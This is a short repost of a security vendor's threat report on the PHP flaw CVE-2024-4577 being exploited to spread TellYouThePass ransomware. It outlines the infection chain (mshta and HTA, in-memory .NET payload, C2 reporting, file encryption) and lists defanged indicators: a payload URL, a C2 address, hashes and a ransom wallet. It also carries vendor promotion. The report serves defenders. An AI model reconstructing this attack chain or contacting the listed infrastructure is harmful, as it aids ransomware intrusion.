Original Post: Update: CVE-2024-4577 quickly weaponized to distribute “TellYouThePass” Ransomware
The report from Imperva Threat Research discusses recent malicious activities exploiting the PHP vulnerability CVE-2024-4577. Detected since June 8th, these attacks have been linked to the "TellYouThePass" ransomware campaign, which targets both Windows and Linux systems. This ransomware has been active since 2019, previously utilizing vulnerabilities like CVE-2021-44228 (Apache Log4j) and CVE-2023-46604.
Attack Vector:
Attackers utilize the PHP vulnerability to execute arbitrary code, leveraging the system function to run HTML application files via mshta.exe, indicating a "living off the land" approach.
Sample Analysis:
- An HTA file containing malicious VBScript is used for initial infection.
- The VBScript decodes a binary loaded into memory during runtime, revealing a .NET variant of TellYouThePass ransomware.
- The executable sends machine details to a command-and-control (C2) server, enumerates directories, kills processes, generates encryption keys, and encrypts files, leaving a ransom note for the victim.
Community Response:
Imperva has tracked discussions about the ransomware on forums like Bleeping Computer and platforms like X. They are continuously monitoring the threat for updates.
Recommendations:
- Patch vulnerabilities promptly.
- Use products like Imperva’s Web Application Firewall to intercept emerging threats.
- Employ Anti-Virus programs to defend against malware campaigns.
Indicators of Compromise (IoCs):
- URL:
hxxp:/88.218.76[.]13/dd3.hta - C2 IP:
88.218.76[.]13 - Sample Hashes:
- HTA:
95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3 - HTA:
5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618 - .NET Binary:
9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53
- HTA:
- Bitcoin Wallet:
bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l
Imperva offers a 30-day free trial for businesses to protect their systems.
Go here to read the Original Post